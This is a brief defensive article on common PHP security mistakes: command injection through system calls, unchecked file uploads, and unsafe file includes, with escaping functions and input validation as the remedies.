common PHP security mistakes

In one of my previous articles, I mentioned the top 5 security
mistakes made in PHP. This article is a follow-up, with some more
common security mistakes.
System Calls
In PHP, there are different ways to execute system calls. The
system(), exec(), and passthru() all allow you to execute
operating-system commands from within your scripts.
Each of these functions, if not checked, can also allow a malicious
user to exploit your system and execute commands that could possible
access private files and information.
Protecting your system from this attack
The input from the user, no matter the context, should never be
trusted. PHP provides two functions, escapeshellarg() and
escapeshellcmd().
The escapeshellarg() function is designed to remove or otherwise
eliminate any potentially harmful characters received from user input
for use as arguments to system commands (in our case, the zip command).
The syntax for this function is as follows:escapeshellarg($command)
where $command is the input to clean, and the return value is the
cleaned string. When executed, this function will add single quotes
around the string and escape (add a slash in front of) any single
quotes that exist in the string.
escapeshellcmd() is similar to this function, except it will only
escape characters that have a special meaning to the underlying
operating system. If user input will be used as part of the argument
list for a system call, the escapeshellarg() function is always the
better choice.
File Uploads
PHP will create a file with the uploaded content, but will not check
whether the filename is valid, or if the type and size are correct
A user could potentially create his own form specifying the name of
some other file that contains sensitive information and submit it,
resulting in the processing of that other file.
Solution
use move_uploaded_file() or is_uploaded_file(). However, there are
some other problems with user-uploaded files and check the $_FILES
super global array to make sure that the user has uploaded the correct
file type/size.
Including Files
In PHP you can include local or remote files by using include(),
include_once(), require() and require_once(). It allows you to have
separate files for classes, reused code and so on, increasing the
maintainability and readability of your code.
The concept of including remote files is dangerous in itself,
though, because the remote site could be compromised or the network
connection could be spoofed. In either scenario, you are injecting
unknown and possibly hostile code directly into your script.
Another issue to think about when including files, is if a file that
is included is dependent on user input. This poses a potential securty
issue, which can be fixed by verifying and cleaning incoming varialbes.
Conclusion
Don’t trust any incoming variables ($_GET,$_POST, or $_COOKIE).
These can all be set by a malicious user and possibly compromise the
securty of your system.